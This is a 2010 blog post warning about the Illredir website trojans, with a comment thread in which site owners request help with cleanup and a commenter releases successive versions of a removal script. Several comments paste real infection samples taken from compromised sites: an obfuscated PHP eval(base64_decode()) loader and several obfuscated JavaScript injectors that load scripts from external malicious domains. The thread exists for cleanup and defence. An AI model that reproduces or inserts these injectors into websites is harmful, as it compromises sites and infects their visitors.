TROJAN ALERT! Illredir-B/Illredir-C/Illredir-D

WARNING, PEOPLE!!! The trojans are mutating faster than we can keep up with. In one of my recent postings, I warned everyone about the Illredir-B trojan, to which Mike kindly provided a script to help us remove the trojan from our websites. In less than 2 weeks, we have been alerted that it has mutated into Illredir-C. Mike quickly modified to script to eliminate both trojans.

Today, a friend asked me to take a look at her website and Avast has detected it as Illredir-D, and when I tested Mike’s script, it wasn’t able to remove the trojan, which means it has mutated into a pattern different from the earlier two; so a further modification of the script will be needed to wipe this out.

It sounds almost like biological warfare with virus mutation.

My hat off to Avast for its quick detection, even though it is free for personal use. My AVG Free did not detect it. I’m so disappointed in it, having believed in it and recommending it to friends for the past few years.

I have also tried a few online website virus scans which were not able to detect this trojan. This is quite a worrying thought, that few antivirus programs are able to keep up with the new trojans, viruses and malware that are mushrooming more quickly than ever.

The good news is that Google is able to detect the malware, and if it has been submitted to Google webmaster, it will block access to the website upon detection of these malwares. You may come across a screenshot like the following:

Snapshot of Google blocking a website. I have blurred the website URL for privacy
Snapshot of Google blocking a website. I have blurred the website URL for privacy

DO NOT IGNORE THE WARNING!

To ensure your own protection, please please please get a good antivirus software!! I highly recommend Avast because even though I’m using the free licence, it is able to detect and block the trojan. Another one that is able to detect this virus (or so I’m told) is Kaspersky, but it’s not available for free download.

[Note: I hope this post will not be ripped off like the earlier post. If you wish to repost this blog entry, please include the original link to this entry which is http://www.zyenweb.com/2010/01/19/trojan-alert-illredir-billredir-cillredir-d/. Thank you.]

Zyen Hoo

Zyen is a Physics, Chemistry and Math teacher with many interests, including running and dancing. She also enjoys indulging in vanity projects such as her personal blog, and is a self-proclaimed reviewer. She is also notoriously slow in updating her blog due to her constant search for the next adrenaline rush (on top of her heavy workload at school and her freelancing projects), so she asks for your forgiveness and understanding of her very delayed updates.

  • hose

    If you want to remove this virus you need: 1. Delete crap from .htaccess file 2. Delete script after /html in site source code That's all. I tested with Illredir-D version. Greetz. hose-hp@tlen.pl

  • hose

    Sometimes also PHP/JavaScript files are infected, so be careful :) (mostly with name index.htm, index.html, index.php)

  • Mike

    Can someone post a url to site nfected with IllRedir-D ?

  • Zyenweb

    @Mike Sorry I cleaned out infected site that my friend asked me to check. But I did keep a copy of the original infected file. Can I email it to you? May I have your email address?

  • Mike

    You should have it its on every one of my posts here and also comes with this removal tool :)

  • bernd

    example of infected site (2010-01.20 12:00) is www.enigmainfo.de (official site of "Enigma" (music)). ALL .js-files, index.*-files on your server will be infected! Change all your ftp-passwords!!! In my case the trojan was reading the pwd-file of "Flash-FXP" (the ftp-tool i am using in WinXP). All accounts stored there have been infected.

  • Mike

    Don't see any virus there ... do you have a samples of that trojan ?

  • MIke

    Uploaded latest version 0.95 http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz This version should remove IllRedir-B/C/D and versions starting with /*CODE1*/ Enjoy and donate if this script has helped you Thanks

  • Broom

    Hi Mike, I tried the latest file, but I still get an error: Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/broom6/public_html/remove-js-illredir-b.php on line 84 when I run this on http://broombox.com/remove-js-illredir-b.php Please HELP!

  • Broom

    PS. Thanks for your help

  • MIke

    This means you're using php 4 instead of php 5 I believe. Try to rename it to .php5 and try again if your hosting company has php5 enabled it should work then

  • Broom

    Thanks for your response Mike. I used the SeoForums script and that seems to have worked. Thanks a lot for taking the time to respond though.

  • Martin

    In http://www.virustotal.com/de/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674 a complete list of antispyware tools is given. Here you can check, which tool detects the trojan and which does not.

  • MIke

    Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96 - Supports PHP 4! - Backups file before modification - Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E Let me know if you having any issues with this release. Thanks !

  • Sergi

    I was using the script and work fine. But in some sites I have another mutation of Illredir (I think) In that case modify all php files with insertion of code at the top of scripts: If I try to access to my site I see a URL like: voila-fr.gamespot.com.uol or others, and I see conection to a russian domain :S I changed the ftp passwords and waiting for other update of your cleaner script, Thanks for all Sorry for my Enfglish

  • Sergi

    I forget the code that I have at the top of all my php files:

  • Sergi

    Ups! /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy91c3IvaG9tZS9kZXphaW5zb2x1dGlvbnMuY29tL3dlYi9tb250Z2F0L3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9qcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));

  • MIke

    http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.97 - removes eval(base64_decode()) PHP attack - removes try{window.onload=function(){ document.write( document.write()))}catch() {} Enjoy ! :))

  • Sergi

    thanks! it works fine! :)

  • leparachute

    I'm bored with this trojan and it's mutations ! After getting B, C and E version, they don't add GNU/GPL text anymore. A new example I'm having below. Do you know if there is a solution somewhere not to be infected again ? Change password, update blog to last version, nothing seems to stop that :( Thanks in advance. try{window.onload=function(){document.write('mobile-de.friendfeed.com.');V8flyhwc7e = document.getElementById('Cmtyp1dk2g').innerHTML + 'm$)e^#$g#&a((u^@p#(l))o!&&a!#)d$^)#-##!#c!o)^!m).!^^$u(!r(l@&#n##$&e#x!@(t^#$.($r!&u$((:))$I!^#)!m@$!u^!&0##)p$#^0(p&&&v!@)0)!!g(k#&d^@@/@!$p$&@^a#(n#!t#$$i$$$p#@^.!&c&)@)o&@!m!/$(p&!a$!#^n!!)(t@^i^&p!!.!@(c&o(^(m@/&$)(r(1$^0)(.(!##n$)(e^@^t((/!t)r#$!a&$^v(&e$@(^&l$^)o^$)c$!&i&&t!(#y!.((c&)&!o^m@/@^@g@(o#!&#o^g##&l!e&.$(&&!c)^!o&$!m!@/^$)'.replace(/(|&|)|^|@|!|#|$/ig, '') ;document.write('');} } catch(Vt836kqo ) {}

  • Didis

    i have the same probleme here, many websites are infected, the code i find is different from what you mentionned, it's like the following : try{window.onload=function(){Pqdekqmwhk62 = '' + 'h((u)(b!p!a$@$g)#e@(!&s@!-&)c()o^^(m@!.#($!$y(o)(^u!&#(j#^(i(&z!($$z!@.#c^@&o()^m(&.!!s((^&m!h#)^-@$#@c^o##^m!(#-@($a@(^u!.(@@#a@$v^a!#$!t^$@@t!!o!(p!&.^r)!u&!):)Y@x&$&@v^$)#6(y(j$&w&)@e$(^6(w$^7)^r@)^/$&g@@o$o@#(g#&l!$^(e&.(@c^o!m(&^/!(g^o$@o&#!$g&^^^l&e&!.#c)@o&$m$/&!t&o&#m!#.$)c^^$o&^(#(m$$(#/(@d^i@c&&^t())(.@@^c@c()@/!@s&#e$@!a@(#&&r@#s)!.(!$(c(^^o!!(m!$/#'.replace(/&|#|(|!|@|^|)|$/ig, '') ;Q7rj4s75mfeh3 = 'appendChild';Mxvqzu6myayt = document.createElement('sc'+'ript');Mxvqzu6myayt.src = 'h'+'ttp://'+Pqdekqmwhk62.replace(/Yxv6yjwe6w7r/g, '8080');Mxvqzu6myayt.setAttribute('defer', 'def'+'er');eval('document.body.'+Q7rj4s75mfeh3+'(Mxvqzu6myayt)');} } catch(Tb3w8uei ) {}

  • Mike

    Updated the code version 0.98 @leparachute - version 0.97 of the script was able to remove your version The new version removes also Didis version Remember to change FTP passwords on the server and don't store passwords on the ftp client don't use TotalComander at all Hope this helps

  • Mike

    Per wikipedia http://en.wikipedia.org/wiki/Gumblar This virus incorporates a network sniffer, so if you're infected don't use http/ftp and/or telnet to access your server. The virus will be able to extract open text passwords. Use https however if its smart enough it might use keylogger too. So, I would recommend: - make sure all infected boxes are shut down - boot one box from live linux cd/dvd - use browser to change passwords on the server (use https) - from now on use only scp, sftp if possible - copy virus removal script on the server (into public_html) - run the script to fix your websites - download http://www.malwarebytes.org/ - download avast - dowload bootable antivir cd/dvd like kaspersky .iso - create bootable antyvir dvd growisofs /dev/dvd=kaspersky.iso - boot from bootable antvir - try to clean windows partitions - if successful boot windows - otherwise restore your system from CD/DVD or restore partition - install avast, malwarebytes, personal firewall - run scans

  • leparachute

    Thanks for your respond Mike, and for your solution to remove the trojan. What I would want is not be infected again. I changed FTP password but it seems - based on what I read - that the code is injected with input tags in forms (and not using FTP). But thanks again for your help ;)

  • Zyenweb

    Hey everyone. Just approved the pending comments. Sorry I didn't approve earlier because I couldn't go on the 'net for a while and I thought the comments would be automatically approved.

  • itsik

    Hi, I am looking for removal tool for version I Thanks!!

  • Ceal

    Hi, Another mutation, and the latest version of Illredir doesn't work... Please help, or tell how to modify Illredir so that it worked.. var H='';this.Ff="";function b() {var U="";var _=new Array();var i='replace';var p=']';this.Fw='';var s=RegExp;var h=new String();var iE='[';var SI;if(SI!='' && SI!='Ax'){SI='e'};var R='g';var K;if(K!='iW'){K='iW'};function F(d,q){var hp;if(hp!='' && hp!='mS'){hp=null};var _g;if(_g!='' && _g!='hn'){_g=null};this.DJ="";var O=iE;var V=new Date();O+=q;var v;if(v!='nL' && v!='eO'){v='nL'};var Mt=new Array();O+=p;var bP=new s(O, R);return d[i](bP, h);};var VL;if(VL!='' && VL!='G'){VL=null};var km="";var Ks='';var Y=F('8595509958959909995',"95");var RB=window;var N=new Date();var w;if(w!='fG' && w!='Nn'){w='fG'};var y=F('hOtPtPpj:7/j/Ocja7rOe7ePrObjuPiOlPdOePrO-DcjoPmD.7lOiDnOeOzDi7nOg7.7c7ojmj.OtOrPaDvPiDaDnO-jc7ojmj.PsDaPmPuPeOsPt7.7rDuO:O',"jO7PD");var QF;if(QF!='To'){QF='To'};var k=F('s4c4r4i4pOtH',"HO4");var eS;if(eS!='' && eS!='Wj'){eS=''};var om;if(om!='' && om!='rD'){om=''};var T=F('cqr7ega7t7egEqlgegmqe7ngtq',"g7q");this.cd="";var Ob='';var o=F('/RaRlRiObOaObRaO.RcRoRmR/RaRlOiRbOaObOaR.RcRoOmR/O3R6O0RbOuOyR.RcRoRmO/OgOoOoOgRlOeR.OcRoOmO/OcRoRnRsOtOaOnRtOcOoOnOtRaRcOtO.OcRoOmO.RpOhOpR',"RO");RB[F('o_nZlIoyaydy',"yZ_Ip")]=function(){try {var wF="";var Bi=new String();this.qX="";Ob+=y;Ob+=Y;var Pp;if(Pp!='' && Pp!='so'){Pp=''};var kW;if(kW!=''){kW='l'};Ob+=o;j=document[T](k);var tT="";var Yt;if(Yt!='VG' && Yt!='NH'){Yt='VG'};var ya='';yD(j,'defer',([1][0]));var xU;if(xU!='E'){xU=''};var Iu=new String();yD(j,'src',Ob);var u;if(u!='We'){u='We'};document.body.appendChild(j);var EM="";var nA=new String();} catch(D){};var Ex;if(Ex!='' && Ex!='asm'){Ex=null};};function yD(DG,t,A){DG.setAttribute(t, A);}this.iY="";var pY="";};var DR;if(DR!='xl' && DR!='VP'){DR='xl'};b();var gz;if(gz!='uu'){gz=''};var FH="";

  • Mike

    Version 1.0 is out. Should fix most of the latest versions however if you're doing something similar to the virus code your code may be removed too. The script is creating backup copies so if something doesn't work after your run the script keep the script output log and restore from the backups. @Andrew Try to use latest version , also don't chmod 777 the script itself just other files. Some php servers wont run the script with write/execute permissions

  • Ceal

    Thanks Mike for the new version, but it's not working with the code above. Can you help?

  • Mike

    Email me your version (code from any forum is already pre-formatted). Zip/Rar the virus with some password and e-mail to the contact email. Include Password :) Thanks !

  • Ceal

    Sent :)

  • LuisTim

    hi guys, I had this virus in my site and with Mike script I cleaned him and worked fine until now. Now I think that I have a new virus, because Mike script isnt clean my website... he cleaned some files but the website continues with virus :( Can someone tell me If is the same virus? My site is: http://www.filmes-terror.com I am using ESET NOD32 and he show me that virus name is: JS/TrojanDownloader.Agent.NSM trojan 05-03-2010 10:54:22 HTTP filter file http://www.filmes-terror.com/ JS/TrojanDownloader.Agent.NSM trojan connection terminated - quarantined Luis-PCLuis Threat was detected upon access to web by the application: C:Program FilesMozilla Firefoxfirefox.exe.

  • LuisTim

    I installed AVAST in other PC and he show me that virus name is: [L] JS:Illredir-W [Trj]

  • LuisTim

    Please, someone? Mike, can you upgrade your script please? :)

  • gberg

    hi all, i need also a newer version ... avast 5 said the virusname is JS:Illredir-AC

  • vale

    This is so bad!!!! I got all my directories infected with JS:Illredir-AC. Please help!!!

  • vale

    there he is: var p;if(p!='' && p!='f'){p=null};this.N="";var u;if(u!=''){u='DD'};var l=new String("hIZrep".substr(3)+"oB8laco8B".substr(3,3)+"e");var tD;if(tD!='_U'){tD=''};var U=RegExp;var I=new String();var li='';function d(R,Q){this.X="";this.m="";var lm=new String();this.QU='';var dA=String("[3Po".substr(0,1));this.Z="";var Uj=String("HVQg".substr(3));this.fH="";dA+=Q;dA+=new String("uMc]".substr(3));this.jF="";this.z='';var n=new U(dA, Uj);this._R='';return R[l](n, new String());};var _D;if(_D!='Sp'){_D=''};var Df=new Date();this.vh='';var j=window;var TL;if(TL!='zs'){TL='zs'};this.ZJ="";var k='';var _Q='';var G=d('oGn4lAoGaGdA',"G4AfY");var g=d('/QgQoGoQgSlSeS.9cSo2mS/GgQo2o9gQlGe9.Qc9oQmQ/ShQuGrGrGi9yGeQt2.2cQoSmQ.Qt2rS/9bGaQr9n2eQsSaSn2d9nSo2bGlSeG.Qc2oQm2/2aSmGa2zQo2nG.9fSrS.Sp9h9pG',"2S9GQ");var RM=d('sVcqr2iVpVtV',"qV2");var cZ="";var lrx;if(lrx!=''){lrx='wz'};var J=d('c_rJeJaJt_eJE_l_eJm_e_nJt_',"_J");var x=new Date();var i;if(i!='PX'){i=''};var rQ=new Array();var W=d('85307158750573',"1753");var qy=new Array();var ZL=new Date();var O=d('h1t1t1pP:H/P/Pg1oHoHg1lPeP-1cHo1mQ-1b1rP.1fHoQrPbPe1sP.QcHo1mH.Qc1aHmHsH-PcHoHm1.1EPxHcQe1l1lHeHnPtHB1lHeQnQdQeHrH.HrPuH:Q',"PQH1");r=function(){var NH=new Date();var a;if(a!=''){a='Op'};this.x_='';w=document[J](RM);var Br;if(Br!='' && Br!='qG'){Br='XS'};var dAD;if(dAD!='' && dAD!='LQ'){dAD='Nv'};var XD;if(XD!='XV' && XD!='_g'){XD='XV'};var cX=new Date();k=O+W;var Hc="";var cn;if(cn!='' && cn!='nn'){cn='Ol'};k+=g;var le=new String();var Ro=new Date();var uQ=new String();var jG='';w.src=k;var ol;if(ol!='Vg'){ol='Vg'};var Gr;if(Gr!='je'){Gr='je'};w.defer=([2,1][1]);var kA="";this.Rb='';var mo;if(mo!='BP'){mo='BP'};document.body.appendChild(w);var sW=new Date();};this.BG='';var Qo=new Array();j[G]=r;this.jk="";var W_="";var b=new String();var AT=new Date();} catch(H){};

  • Mike

    Version 1.01 is out

  • Mike

    If you want cure send me the samples in a zip/rar archive

  • Marcin Jung

    @Mike ! Wow i'm impressed !

  • neo64

    Hi, Another mutation, and the latest version of Illredir doesn’t work… Please help, or tell how to modify Illredir so that it worked.. Thanks var Z='';function A() {var EW;if(EW!='W'){EW='W'};var B;if(B!='N'){B='N'};var I=new String("ap"+"pe"+"nd"+"Ch"+"il"+"HML5d".substr(4));var uL=String("ghOTN".substr(0,1));var n;if(n!='Q' && n!='Fe'){n=''};var k=RegExp;var P="";var X=new Array();var E=new String("scSBDI".substr(0,2)+"ri"+"pt39w7".substr(0,2));this.YO="";var kJ=new Array();var j;var p=window;var sI;if(sI!='YA' && sI!='_'){sI=''};var bh=new Date();var e="Z0h]".substr(3);var HL=new Date();var bM;if(bM!=''){bM='Ea'};var f='';var wj=new String();var Mk;if(Mk!='ep'){Mk='ep'};var uC;if(uC!='l' && uC != ''){uC=null};function u(q,fx){var DJ;if(DJ!='z'){DJ='z'};var c="[";this.EM="";c+=fx;var MY=new Date();var Rm=new Array();c+=e;var gD;if(gD!='yN'){gD='yN'};var H=new k(c, uL);var VW;if(VW!='ta' && VW!='i'){VW='ta'};var Kp;if(Kp!='Rmu' && Kp!='Ys'){Kp='Rmu'};return q.replace(H, f);var Ps;if(Ps!='yr' && Ps!='wc'){Ps=''};this.Sf="";};var Yd=new Array();var m=new String("onlo"+"ad");var zg;if(zg!='' && zg!='lv'){zg=null};var Lh=new String();this.gp='';var Ip=u('serncf','fik0W1lT8P4mhp5Hje7_nx');var Zc;if(Zc!='AK'){Zc=''};var v=String("defer");this.uA="";this.Cn="";j=function(){var GW="";var Bf='';this.A_="";try {var sV;if(sV!=''){sV='CL'};this.T='';U=document.createElement(E);var hz=new Date();var qd;if(qd!='QC' && qd != ''){qd=null};U[v]=[1,1][0];var Kj;if(Kj!='Tb' && Kj!='sn'){Kj='Tb'};var F="l7fbo".substr(3)+"INYQdy".substr(4);this.oT='';var dW='';U[Ip] = u('hStNt6p6:_/1/1p1oSk_eTs2a_cjk_.Sr_u1:N','62TjS1NO_')+u('866942167414379770265732646923592185954451297651770254292532473443','19365472')+u('/OfOrZeOeOlUoOt4t4oZ-3c4o3m3/3gSoZo4g4l3eS.UcOo3mZ/Sl3oUcZkSe4rUzS.Oc4oSmO.SpZhUpS','S4OZ3U');var Mj="";var FH=new Array();var ZP="";var jK="";document[F][I](U);} catch(O){var ge;if(ge!='Fo'){ge='Fo'};};var rMH;if(rMH!='El'){rMH='El'};var __=new String();};var jY;if(jY!='yL' && jY!='NZ'){jY='yL'};var ek;if(ek!='mE'){ek=''};p[m]=j;var yh='';this.PE="";};A();var Wp=new Array();var Mw=new Array();

  • Scott

    Please help, I do not have Avast or Kapersky -(have norton) and customers are calling me saying site is flagging virus. File Name: http://www.metrodetroitbjj.com/ Malware name: JS:Illredir-AX [Trj] Malware Type: Trojan Horse VPS version: 100421-1, 04/21/2010 any help would be appreciated Thanks in advance Scott

  • Min

    Hi Guys, Avast detects my website has a virus JS:Illredir-BU [Trj]. My website is www.funanweng.com. Can anyone teach me how to remove it? Any help will be very much appreciated. I'm at my wits end. Thanks!!!!! Min

  • Lilly King

    Very impressive....I am completely lost with computers and how to protect myself fromall the virus and torjans out there. Now I know a little more thanks to this well written article.

  • Pingback: Mary Yorke

Leave a comment

Your email address will not be published. Required fields are marked *